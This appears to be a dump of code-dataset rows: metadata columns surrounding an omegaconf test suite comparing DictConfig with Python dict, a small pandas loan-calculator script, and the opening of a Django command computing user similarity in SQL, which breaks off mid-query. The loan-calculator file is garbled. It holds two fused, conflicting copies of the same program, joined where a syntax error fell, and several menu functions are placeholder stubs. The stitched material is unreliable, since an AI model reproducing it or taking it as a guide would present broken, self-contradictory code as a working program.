| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
33905cbd909f88fcf7117f15ddb32118a33659e0
| 22,354
|
py
|
Python
|
tests/test_compare_dictconfig_vs_dict.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 1,091
|
2018-09-06T17:27:12.000Z
|
2022-03-31T13:47:45.000Z
|
tests/test_compare_dictconfig_vs_dict.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 624
|
2019-06-11T20:53:19.000Z
|
2022-03-30T20:44:25.000Z
|
tests/test_compare_dictconfig_vs_dict.py
|
sugatoray/omegaconf
|
edf9e86493a14b0e909e956d9bae59b9861ef9c5
|
[
"BSD-3-Clause"
] | 71
|
2019-06-14T05:32:45.000Z
|
2022-03-27T19:52:35.000Z
|
"""
This file compares DictConfig methods with the corresponding
methods of standard python's dict.
The following methods are compared:
__contains__
__delitem__
__eq__
__getitem__
__setitem__
get
pop
keys
values
items
We have separate test classes for the following cases:
TestUntypedDictConfig: for DictConfig without a set key_type
TestPrimitiveTypeDunderMethods: for DictConfig where key_type is primitive
TestEnumTypeDunderMethods: for DictConfig where key_type is Enum
"""
from copy import deepcopy
from enum import Enum
from typing import Any, Dict, Optional
from pytest import fixture, mark, param, raises
from omegaconf import DictConfig, OmegaConf
from omegaconf.errors import ConfigKeyError, ConfigTypeError, KeyValidationError
from tests import Enum1
@fixture(params=["str", 1, 3.1415, True, Enum1.FOO])
def key(request: Any) -> Any:
    """Parametrized fixture: one candidate key (str/int/float/bool/Enum) per run."""
    candidate: Any = request.param
    return candidate
@fixture
def python_dict(data: Dict[Any, Any]) -> Dict[Any, Any]:
    """An independent deep copy of ``data``: the plain-dict baseline for comparison."""
    baseline: Dict[Any, Any] = deepcopy(data)
    return baseline
@fixture(params=[None, False, True])
def struct_mode(request: Any) -> Optional[bool]:
    """Struct-mode flag under test: None (unset), False, or True."""
    mode: Optional[bool] = request.param
    return mode
@mark.parametrize(
    "data",
    [
        param({"a": 10}, id="str"),
        param({1: "a"}, id="int"),
        param({123.45: "a"}, id="float"),
        param({True: "a"}, id="bool"),
        param({Enum1.FOO: "foo"}, id="Enum1"),
    ],
)
class TestUntypedDictConfig:
    """Compare DictConfig with python dict in the case where key_type is not set."""
    @fixture
    def cfg(self, python_dict: Any, struct_mode: Optional[bool]) -> DictConfig:
        """Create a DictConfig instance from the given data."""
        cfg: DictConfig = DictConfig(content=python_dict)
        OmegaConf.set_struct(cfg, struct_mode)
        return cfg
    def test__setitem__(
        self, python_dict: Any, cfg: DictConfig, key: Any, struct_mode: Optional[bool]
    ) -> None:
        """Ensure that __setitem__ has same effect on python dict and on DictConfig."""
        # In struct mode, setting a key that is not already present is an error.
        if struct_mode and key not in cfg:
            with raises(ConfigKeyError):
                cfg[key] = "sentinel"
        else:
            python_dict[key] = "sentinel"
            cfg[key] = "sentinel"
            assert python_dict == cfg
    def test__getitem__(self, python_dict: Any, cfg: DictConfig, key: Any) -> None:
        """Ensure that __getitem__ has same result with python dict as with DictConfig."""
        try:
            result = python_dict[key]
        except KeyError:
            # dict raises KeyError; DictConfig raises ConfigKeyError.
            with raises(ConfigKeyError):
                cfg[key]
        else:
            assert result == cfg[key]
    @mark.parametrize("struct_mode", [False, None])
    def test__delitem__(self, python_dict: Any, cfg: DictConfig, key: Any) -> None:
        """Ensure that __delitem__ has same result with python dict as with DictConfig."""
        try:
            del python_dict[key]
            assert key not in python_dict
        except KeyError:
            with raises(ConfigKeyError):
                del cfg[key]
        else:
            del cfg[key]
            assert key not in cfg
    @mark.parametrize("struct_mode", [True])
    def test__delitem__struct_mode(
        self, python_dict: Any, cfg: DictConfig, key: Any
    ) -> None:
        """Ensure that __delitem__ fails in struct_mode."""
        with raises(ConfigTypeError):
            del cfg[key]
    def test__contains__(self, python_dict: Any, cfg: Any, key: Any) -> None:
        """Ensure that __contains__ has same result with python dict as with DictConfig."""
        assert (key in python_dict) == (key in cfg)
    def test__eq__(self, python_dict: Any, cfg: Any, key: Any) -> None:
        """Ensure that a DictConfig compares equal to the dict it was built from."""
        assert python_dict == cfg
    def test_get(self, python_dict: Any, cfg: DictConfig, key: Any) -> None:
        """Ensure that get has same result with python dict as with DictConfig."""
        assert python_dict.get(key) == cfg.get(key)
    def test_get_with_default(
        self, python_dict: Any, cfg: DictConfig, key: Any
    ) -> None:
        """Ensure that get(..., DEFAULT) has same result with python dict as with DictConfig."""
        assert python_dict.get(key, "DEFAULT") == cfg.get(key, "DEFAULT")
    @mark.parametrize("struct_mode", [False, None])
    def test_pop(
        self,
        python_dict: Any,
        cfg: DictConfig,
        key: Any,
    ) -> None:
        """Ensure that pop has same result with python dict as with DictConfig."""
        try:
            result = python_dict.pop(key)
        except KeyError:
            with raises(ConfigKeyError):
                cfg.pop(key)
        else:
            assert result == cfg.pop(key)
            assert python_dict.keys() == cfg.keys()
    @mark.parametrize("struct_mode", [True])
    def test_pop_struct_mode(
        self,
        python_dict: Any,
        cfg: DictConfig,
        key: Any,
    ) -> None:
        """Ensure that pop fails in struct mode."""
        with raises(ConfigTypeError):
            cfg.pop(key)
    @mark.parametrize("struct_mode", [False, None])
    def test_pop_with_default(
        self,
        python_dict: Any,
        cfg: DictConfig,
        key: Any,
    ) -> None:
        """Ensure that pop(..., DEFAULT) has same result with python dict as with DictConfig."""
        assert python_dict.pop(key, "DEFAULT") == cfg.pop(key, "DEFAULT")
        assert python_dict.keys() == cfg.keys()
    @mark.parametrize("struct_mode", [True])
    def test_pop_with_default_struct_mode(
        self,
        python_dict: Any,
        cfg: DictConfig,
        key: Any,
    ) -> None:
        """Ensure that pop(..., DEFAULT) fails in struct mode."""
        with raises(ConfigTypeError):
            cfg.pop(key, "DEFAULT")
    def test_keys(self, python_dict: Any, cfg: Any) -> None:
        """Ensure keys() agree between dict and DictConfig."""
        assert python_dict.keys() == cfg.keys()
    def test_values(self, python_dict: Any, cfg: Any) -> None:
        """Ensure values() agree between dict and DictConfig."""
        assert list(python_dict.values()) == list(cfg.values())
    def test_items(self, python_dict: Any, cfg: Any) -> None:
        """Ensure items() agree between dict and DictConfig."""
        assert list(python_dict.items()) == list(cfg.items())
@fixture
def cfg_typed(
    python_dict: Any, cfg_key_type: Any, struct_mode: Optional[bool]
) -> DictConfig:
    """Create a DictConfig instance that has strongly-typed keys."""
    typed_cfg: DictConfig = DictConfig(content=python_dict, key_type=cfg_key_type)
    OmegaConf.set_struct(typed_cfg, struct_mode)
    return typed_cfg
@mark.parametrize(
    "cfg_key_type,data",
    [(str, {"a": 10}), (int, {1: "a"}), (float, {123.45: "a"}), (bool, {True: "a"})],
)
class TestPrimitiveTypeDunderMethods:
    """Compare DictConfig with python dict in the case where key_type is a primitive type."""
    # Throughout: a key is valid for the config either when it is an instance
    # of cfg_key_type, or when cfg_key_type is bool and the key is 0/1
    # (int keys coerced to bool).
    def test__setitem__primitive_typed(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
        struct_mode: Optional[bool],
    ) -> None:
        """When DictConfig keys are strongly typed,
        ensure that __setitem__ has same effect on python dict and on DictConfig."""
        if struct_mode and key not in cfg_typed:
            if isinstance(key, cfg_key_type) or (
                cfg_key_type == bool and key in (0, 1)
            ):
                with raises(ConfigKeyError):
                    cfg_typed[key] = "sentinel"
            else:
                with raises(KeyValidationError):
                    cfg_typed[key] = "sentinel"
        else:
            python_dict[key] = "sentinel"
            if isinstance(key, cfg_key_type) or (
                cfg_key_type == bool and key in (0, 1)
            ):
                cfg_typed[key] = "sentinel"
                assert python_dict == cfg_typed
            else:
                with raises(KeyValidationError):
                    cfg_typed[key] = "sentinel"
    def test__getitem__primitive_typed(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """When DictConfig keys are strongly typed,
        ensure that __getitem__ has same result with python dict as with DictConfig."""
        try:
            result = python_dict[key]
        except KeyError:
            if isinstance(key, cfg_key_type) or (
                cfg_key_type == bool and key in (0, 1)
            ):
                with raises(ConfigKeyError):
                    cfg_typed[key]
            else:
                with raises(KeyValidationError):
                    cfg_typed[key]
        else:
            assert result == cfg_typed[key]
    @mark.parametrize("struct_mode", [False, None])
    def test__delitem__primitive_typed(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """When DictConfig keys are strongly typed,
        ensure that __delitem__ has same result with python dict as with DictConfig."""
        try:
            del python_dict[key]
            assert key not in python_dict
        except KeyError:
            if isinstance(key, cfg_key_type) or (
                cfg_key_type == bool and key in (0, 1)
            ):
                with raises(ConfigKeyError):
                    del cfg_typed[key]
            else:
                with raises(KeyValidationError):
                    del cfg_typed[key]
        else:
            del cfg_typed[key]
            assert key not in cfg_typed
    @mark.parametrize("struct_mode", [True])
    def test__delitem__primitive_typed_struct_mode(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """Ensure that struct-mode __delitem__ raises ConfigTypeError or KeyValidationError."""
        if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
            with raises(ConfigTypeError):
                del cfg_typed[key]
        else:
            with raises(KeyValidationError):
                del cfg_typed[key]
    def test__contains__primitive_typed(
        self, python_dict: Any, cfg_typed: Any, key: Any
    ) -> None:
        """Ensure that __contains__ has same result with python dict as with DictConfig."""
        assert (key in python_dict) == (key in cfg_typed)
    def test__eq__primitive_typed(
        self, python_dict: Any, cfg_typed: Any, key: Any
    ) -> None:
        """Ensure that a typed DictConfig compares equal to its source dict."""
        assert python_dict == cfg_typed
    def test_get_primitive_typed(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """Ensure that get has same result with python dict as with DictConfig."""
        if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
            assert python_dict.get(key) == cfg_typed.get(key)
        else:
            with raises(KeyValidationError):
                cfg_typed.get(key)
    def test_get_with_default_primitive_typed(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """Ensure that get(..., DEFAULT) has same result with python dict as with DictConfig."""
        if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
            assert python_dict.get(key, "DEFAULT") == cfg_typed.get(key, "DEFAULT")
        else:
            with raises(KeyValidationError):
                cfg_typed.get(key, "DEFAULT")
    @mark.parametrize("struct_mode", [False, None])
    def test_pop_primitive_typed(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """Ensure that pop has same result with python dict as with DictConfig."""
        if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
            try:
                result = python_dict.pop(key)
            except KeyError:
                with raises(ConfigKeyError):
                    cfg_typed.pop(key)
            else:
                assert result == cfg_typed.pop(key)
                assert python_dict.keys() == cfg_typed.keys()
        else:
            with raises(KeyValidationError):
                cfg_typed.pop(key)
    @mark.parametrize("struct_mode", [True])
    def test_pop_primitive_typed_struct_mode(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """Ensure that pop fails in struct mode."""
        with raises(ConfigTypeError):
            cfg_typed.pop(key)
    @mark.parametrize("struct_mode", [False, None])
    def test_pop_with_default_primitive_typed(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """Ensure that pop(..., DEFAULT) has same result with python dict as with DictConfig."""
        if isinstance(key, cfg_key_type) or (cfg_key_type == bool and key in (0, 1)):
            assert python_dict.pop(key, "DEFAULT") == cfg_typed.pop(key, "DEFAULT")
            assert python_dict.keys() == cfg_typed.keys()
        else:
            with raises(KeyValidationError):
                cfg_typed.pop(key, "DEFAULT")
    @mark.parametrize("struct_mode", [True])
    def test_pop_with_default_primitive_typed_struct_mode(
        self,
        python_dict: Any,
        cfg_typed: DictConfig,
        key: Any,
        cfg_key_type: Any,
    ) -> None:
        """Ensure that pop(..., DEFAULT) fails in struct mode."""
        # NOTE(review): the call below omits the default, unlike the test name
        # suggests; struct mode raises ConfigTypeError either way.
        with raises(ConfigTypeError):
            cfg_typed.pop(key)
    def test_keys_primitive_typed(self, python_dict: Any, cfg_typed: Any) -> None:
        """Ensure keys() agree between dict and typed DictConfig."""
        assert python_dict.keys() == cfg_typed.keys()
    def test_values_primitive_typed(self, python_dict: Any, cfg_typed: Any) -> None:
        """Ensure values() agree between dict and typed DictConfig."""
        assert list(python_dict.values()) == list(cfg_typed.values())
    def test_items_primitive_typed(self, python_dict: Any, cfg_typed: Any) -> None:
        """Ensure items() agree between dict and typed DictConfig."""
        assert list(python_dict.items()) == list(cfg_typed.items())
@mark.parametrize("cfg_key_type,data", [(Enum1, {Enum1.FOO: "foo"})])
class TestEnumTypeDunderMethods:
"""Compare DictConfig with python dict in the case where key_type is an Enum type."""
@fixture
def key_coerced(self, key: Any, cfg_key_type: Any) -> Any:
"""
This handles key coersion in the special case where DictConfig key_type
is a subclass of Enum: keys of type `str` or `int` are coerced to `key_type`.
See https://github.com/omry/omegaconf/pull/484#issuecomment-765772019
"""
assert issubclass(cfg_key_type, Enum)
if type(key) == str and key in [e.name for e in cfg_key_type]:
return cfg_key_type[key]
elif type(key) == int and key in [e.value for e in cfg_key_type]:
return cfg_key_type(key)
else:
return key
def test__setitem__enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
struct_mode: Optional[bool],
) -> None:
"""When DictConfig keys are strongly typed,
ensure that __setitem__ has same effect on python dict and on DictConfig."""
if struct_mode and key_coerced not in cfg_typed:
if isinstance(key_coerced, cfg_key_type):
with raises(ConfigKeyError):
cfg_typed[key] = "sentinel"
else:
with raises(KeyValidationError):
cfg_typed[key] = "sentinel"
else:
python_dict[key_coerced] = "sentinel"
if isinstance(key_coerced, cfg_key_type):
cfg_typed[key] = "sentinel"
assert python_dict == cfg_typed
else:
with raises(KeyValidationError):
cfg_typed[key] = "sentinel"
def test__getitem__enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""When Dictconfig keys are strongly typed,
ensure that __getitem__ has same result with python dict as with DictConfig."""
try:
result = python_dict[key_coerced]
except KeyError:
if isinstance(key_coerced, cfg_key_type):
with raises(ConfigKeyError):
cfg_typed[key]
else:
with raises(KeyValidationError):
cfg_typed[key]
else:
assert result == cfg_typed[key]
@mark.parametrize("struct_mode", [False, None])
def test__delitem__enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""When Dictconfig keys are strongly typed,
ensure that __delitem__ has same result with python dict as with DictConfig."""
try:
del python_dict[key_coerced]
assert key_coerced not in python_dict
except KeyError:
if isinstance(key_coerced, cfg_key_type):
with raises(ConfigKeyError):
del cfg_typed[key]
else:
with raises(KeyValidationError):
del cfg_typed[key]
else:
del cfg_typed[key]
assert key not in cfg_typed
@mark.parametrize("struct_mode", [True])
def test__delitem__enum_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that __delitem__ errors in struct mode"""
if isinstance(key_coerced, cfg_key_type):
with raises(ConfigTypeError):
del cfg_typed[key]
else:
with raises(KeyValidationError):
del cfg_typed[key]
def test__contains__enum_typed(
self, python_dict: Any, cfg_typed: Any, key: Any, key_coerced: Any
) -> None:
"""Ensure that __contains__ has same result with python dict as with DictConfig."""
assert (key_coerced in python_dict) == (key in cfg_typed)
def test__eq__enum_typed(self, python_dict: Any, cfg_typed: Any, key: Any) -> None:
assert python_dict == cfg_typed
def test_get_enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
if isinstance(key_coerced, cfg_key_type):
assert python_dict.get(key_coerced) == cfg_typed.get(key)
else:
with raises(KeyValidationError):
cfg_typed.get(key)
def test_get_with_default_enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that __getitem__ has same result with python dict as with DictConfig."""
if isinstance(key_coerced, cfg_key_type):
assert python_dict.get(key_coerced, "DEFAULT") == cfg_typed.get(
key, "DEFAULT"
)
else:
with raises(KeyValidationError):
cfg_typed.get(key, "DEFAULT")
@mark.parametrize("struct_mode", [False, None])
def test_pop_enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop has same result with python dict as with DictConfig."""
if isinstance(key_coerced, cfg_key_type):
try:
result = python_dict.pop(key_coerced)
except KeyError:
with raises(ConfigKeyError):
cfg_typed.pop(key)
else:
assert result == cfg_typed.pop(key)
assert python_dict.keys() == cfg_typed.keys()
else:
with raises(KeyValidationError):
cfg_typed.pop(key)
@mark.parametrize("struct_mode", [True])
def test_pop_enum_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop fails in struct mode"""
with raises(ConfigTypeError):
cfg_typed.pop(key)
@mark.parametrize("struct_mode", [False, None])
def test_pop_with_default_enum_typed(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop(..., DEFAULT) has same result with python dict as with DictConfig."""
if isinstance(key_coerced, cfg_key_type):
assert python_dict.pop(key_coerced, "DEFAULT") == cfg_typed.pop(
key, "DEFAULT"
)
assert python_dict.keys() == cfg_typed.keys()
else:
with raises(KeyValidationError):
cfg_typed.pop(key, "DEFAULT")
@mark.parametrize("struct_mode", [True])
def test_pop_with_default_enum_typed_struct_mode(
self,
python_dict: Any,
cfg_typed: DictConfig,
key: Any,
key_coerced: Any,
cfg_key_type: Any,
) -> None:
"""Ensure that pop(..., DEFAULT) errors in struct mode"""
with raises(ConfigTypeError):
cfg_typed.pop(key)
def test_keys_enum_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert python_dict.keys() == cfg_typed.keys()
def test_values_enum_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert list(python_dict.values()) == list(cfg_typed.values())
def test_items_enum_typed(self, python_dict: Any, cfg_typed: Any) -> None:
assert list(python_dict.items()) == list(cfg_typed.items())
| 34.496914
| 101
| 0.594659
| 2,688
| 22,354
| 4.695313
| 0.056548
| 0.099041
| 0.045163
| 0.06196
| 0.842881
| 0.827351
| 0.805324
| 0.786784
| 0.775374
| 0.76444
| 0
| 0.003745
| 0.307238
| 22,354
| 647
| 102
| 34.550232
| 0.811249
| 0.167039
| 0
| 0.740741
| 0
| 0
| 0.027067
| 0
| 0
| 0
| 0
| 0
| 0.089669
| 1
| 0.099415
| false
| 0
| 0.013645
| 0
| 0.134503
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3397440c72e7652238f4c51ffed77b5f3e8f18d9
| 5,613
|
py
|
Python
|
loan-calculator.py
|
jacobmask/loanCalculatorProgram
|
be6f3497742c1f1c8a0b0c007137406f1ec13fea
|
[
"MIT"
] | 1
|
2021-06-05T20:00:33.000Z
|
2021-06-05T20:00:33.000Z
|
loan-calculator.py
|
jacobmask/loanCalculatorProgram
|
be6f3497742c1f1c8a0b0c007137406f1ec13fea
|
[
"MIT"
] | null | null | null |
loan-calculator.py
|
jacobmask/loanCalculatorProgram
|
be6f3497742c1f1c8a0b0c007137406f1ec13fea
|
[
"MIT"
] | null | null | null |
"""
Author: Jacob Mask
Created: 6/5/2021
Modified: 6/5/2021
Notes: An app that calculates multiple monthly loan payments.
"""
import pandas as pd
import os
import time
def main():
    """Entry point: open the main menu, creating data.csv on first run."""
    if not os.path.exists("data.csv"):
        print("Welcome new user")
        print("Creating a data.csv file for your storage")
        # Create the empty storage file, then walk the user through first entry.
        storage = open("data.csv", "w+")
        storage.close()
        firstTimeUI()
    else:
        print("Loading your data")
        UI()
def firstTimeUI():
    """Prompt for the first loan and seed data.csv with it, then open the menu.

    Fix: removed the local ``loans`` dict that was filled but never read
    (dead code); the DataFrame is the only thing persisted.
    """
    loanName = input("Enter loan name: ")
    print("Insert the yearly interest rate without symbols")
    interest = input("Example: 2.5 not .025: ")
    amount = input("Total amount of loan: ")
    data = [[loanName, amount, interest]]
    df = pd.DataFrame(data, columns=['Name', 'Amount', 'Interest'])
    print(df)
    # NOTE: index=False is deliberately NOT passed here — this version of
    # viewLoans() compensates by slicing columns 1:4 to skip the index column.
    df.to_csv("data.csv")
    print("Congrats on inserting your first loan!")
    UI()
def UI():
    """Main menu loop: dispatch single-letter commands until the user quits."""
    actions = {
        "a": viewLoans,
        "b": changeLoans,
        "c": calculator,
        "y": main,
        "z": exit,
    }
    entry = "null"
    while entry != "Z":
        print("Type a letter from the below options")
        print("A: View Loans")
        print("B: Change/Add/Remove loans")
        print("C: Calculator")
        #print("D: Payments Simulator")
        print("Y: Restart program")
        print("Z: Close program")
        entry = input("Type a single letter: ")
        handler = actions.get(entry.lower())
        if handler is None:
            print("\nEntry invalid, try again.\n")
        else:
            handler()
def viewLoans():
    """Print the stored loans, skipping the CSV's leading index column."""
    frame = pd.read_csv("data.csv")
    # Columns 1:4 drop the unnamed index column written by firstTimeUI().
    subset = frame.iloc[0:10000, 1:4]
    print(subset)
def changeLoans():
    """Loan-maintenance submenu; loops until the user returns to the main menu."""
    actions = {
        "a": addLoan,
        "b": updateLoan,
        "c": deleteLoan,
        "z": UI,
    }
    entry = "null"
    while entry != "Z":
        print("\n\n\nUpdate Loan Options:")
        print("A: Add a loan")
        print("B: Update a loan")
        print("C: Delete a loan")
        print("Z: Back to main menu")
        entry = input("Type a single letter: ")
        handler = actions.get(entry.lower())
        if handler is None:
            print("\nEntry invalid, try again\n")
        else:
            handler()
def addLoan():
    """Placeholder — loan creation is not implemented in this build."""
    print("test1")


def updateLoan():
    """Placeholder — loan update is not implemented in this build."""
    print("Test2")


def deleteLoan():
    """Placeholder — loan deletion is not implemented in this build."""
    print("Test4")


def calculator():
    """Placeholder — the payment calculator is not implemented in this build."""
    print("TESt3")
# Run the interactive menu only when executed as a script.
if __name__ == '__main__':
    main()
# FIX: the original fused main() and the following script's opening triple
# quote onto one line (main()"""), which is a SyntaxError; the docstring of
# the second copy now starts on its own line.
"""
Author: Jacob Mask
Created: 6/5/2021
Modified: 6/5/2021
Notes: An app that calculates multiple monthly loan payments.
"""
import pandas as pd
import os
import time
def main():
    """Entry point: resume from an existing data.csv or create one first."""
    has_data = os.path.exists("data.csv")
    if has_data:
        print("Loading your data")
        UI()
    else:
        print("Welcome new user")
        print("Creating a data.csv file for your storage")
        handle = open("data.csv", "w+")
        handle.close()
        firstTimeUI()
def firstTimeUI():
    """Collect the user's first loan, write it to data.csv, then open the menu."""
    name = input("Enter loan name: ")
    print("Insert the yearly interest rate without symbols")
    rate = input("Example: 2.5 not .025: ")
    total = input("Total amount of loan: ")
    frame = pd.DataFrame([[name, total, rate]], columns=['Name', 'Amount', 'Interest'])
    print(frame)
    # index=False keeps the row index out of the stored CSV.
    frame.to_csv("data.csv", index=False)
    print("Congrats on inserting your first loan!")
    UI()
def UI():
    """Top-level menu: read one letter per pass and run the matching action."""
    entry = "null"
    while entry != "Z":
        print("Type a letter from the below options")
        print("A: View Loans")
        print("B: Change/Add/Remove loans")
        print("C: Calculator")
        #print("D: Payments Simulator")
        print("Y: Restart program")
        print("Z: Close program")
        entry = input("Type a single letter: ")
        if entry in ("A", "a"):
            viewLoans()
        elif entry in ("B", "b"):
            changeLoans()
        elif entry in ("C", "c"):
            calculator()
        elif entry in ("Y", "y"):
            main()
        elif entry in ("Z", "z"):
            exit()
        else:
            print("\nEntry invalid, try again.\n")
def viewLoans():
    """Display every stored loan."""
    print(pd.read_csv("data.csv"))
def changeLoans():
    """Submenu for adding/updating/deleting loans; 'Z' returns to the main menu."""
    entry = "null"
    while entry != "Z":
        print("\n\n\nUpdate Loan Options:")
        print("A: Add a loan")
        print("B: Update a loan")
        print("C: Delete a loan")
        print("Z: Back to main menu")
        entry = input("Type a single letter: ")
        if entry in ("A", "a"):
            addLoan()
        elif entry in ("B", "b"):
            updateLoan()
        elif entry in ("C", "c"):
            deleteLoan()
        elif entry in ("Z", "z"):
            UI()
        else:
            print("\nEntry invalid, try again\n")
def addLoan():
    """Append one user-entered loan to data.csv, showing before/after tables."""
    existing = pd.read_csv("data.csv")
    print('\n', existing, '\n')
    name = input("Enter loan name: ")
    print("Insert the yearly interest rate without symbols")
    rate = input("Example: 2.5 not .025: ")
    total = input("Total amount of loan: ")
    new_row = pd.DataFrame([[name, total, rate]], columns=['Name', 'Amount', 'Interest'])
    combined = pd.concat([existing, new_row])
    combined.to_csv("data.csv", index=False)
    print('\n', combined, '\n')
def updateLoan():
    """Not implemented yet."""
    print("Not yet complete")


def deleteLoan():
    """Not implemented yet."""
    print("Not yet complete")


def calculator():
    """Not implemented yet."""
    print("Not yet complete")
# Run the interactive menu only when executed as a script.
if __name__ == '__main__':
    main()
| 26.601896
| 92
| 0.543916
| 704
| 5,613
| 4.305398
| 0.18892
| 0.04157
| 0.019795
| 0.025074
| 0.896404
| 0.881887
| 0.881887
| 0.872649
| 0.859782
| 0.859782
| 0
| 0.013496
| 0.300374
| 5,613
| 210
| 93
| 26.728571
| 0.75834
| 0.010689
| 0
| 0.896552
| 0
| 0
| 0.291928
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.034483
| null | null | 0.287356
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
33dc673bc291dae2f719e48b667a043253fb4750
| 10,130
|
py
|
Python
|
ktapp/management/commands/calculate_uur.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | 5
|
2015-04-13T09:44:31.000Z
|
2017-10-19T01:07:58.000Z
|
ktapp/management/commands/calculate_uur.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | 49
|
2015-02-15T07:12:05.000Z
|
2022-03-11T23:11:43.000Z
|
ktapp/management/commands/calculate_uur.py
|
cu2/KT
|
8a0964b77dce150358637faa679d969a07e42f07
|
[
"CC-BY-3.0"
] | null | null | null |
import datetime
import random
from django.core.management.base import BaseCommand
from django.db import connection
from ktapp import models
INSERT_SQL_TEMPLATE_1 = '''
INSERT INTO ktapp_useruserrating (
user_1_id, user_2_id, keyword_id,
number_of_ratings,
similarity,
last_calculated_at
)
VALUES(%s, %s, %s, %s, %s, %s)
'''
INSERT_SQL_TEMPLATE_2 = '''
INSERT INTO ktapp_useruserrating (
user_2_id, user_1_id, keyword_id,
number_of_ratings,
similarity,
last_calculated_at
)
VALUES(%s, %s, %s, %s, %s, %s)
'''
GENERIC_SIMILARITY_TEMPLATE = '''
SELECT
user_1_id, user_2_id, keyword_id,
number_of_ratings,
ROUND(1.0 * (
100 * number_of_ratings_11 +
85 * number_of_ratings_12 +
50 * number_of_ratings_13 +
15 * number_of_ratings_14 +
0 * number_of_ratings_15 +
85 * number_of_ratings_21 +
100 * number_of_ratings_22 +
65 * number_of_ratings_23 +
30 * number_of_ratings_24 +
15 * number_of_ratings_25 +
50 * number_of_ratings_31 +
65 * number_of_ratings_32 +
100 * number_of_ratings_33 +
65 * number_of_ratings_34 +
50 * number_of_ratings_35 +
15 * number_of_ratings_41 +
30 * number_of_ratings_42 +
65 * number_of_ratings_43 +
100 * number_of_ratings_44 +
85 * number_of_ratings_45 +
0 * number_of_ratings_51 +
15 * number_of_ratings_52 +
50 * number_of_ratings_53 +
85 * number_of_ratings_54 +
100 * number_of_ratings_55
) / number_of_ratings) AS similarity,
%s AS last_calculated_at
FROM (
SELECT
v1.user_id AS user_1_id, v2.user_id AS user_2_id, NULL AS keyword_id,
COUNT(1) AS number_of_ratings,
SUM(v1.rating = 1 AND v2.rating = 1) AS number_of_ratings_11,
SUM(v1.rating = 1 AND v2.rating = 2) AS number_of_ratings_12,
SUM(v1.rating = 1 AND v2.rating = 3) AS number_of_ratings_13,
SUM(v1.rating = 1 AND v2.rating = 4) AS number_of_ratings_14,
SUM(v1.rating = 1 AND v2.rating = 5) AS number_of_ratings_15,
SUM(v1.rating = 2 AND v2.rating = 1) AS number_of_ratings_21,
SUM(v1.rating = 2 AND v2.rating = 2) AS number_of_ratings_22,
SUM(v1.rating = 2 AND v2.rating = 3) AS number_of_ratings_23,
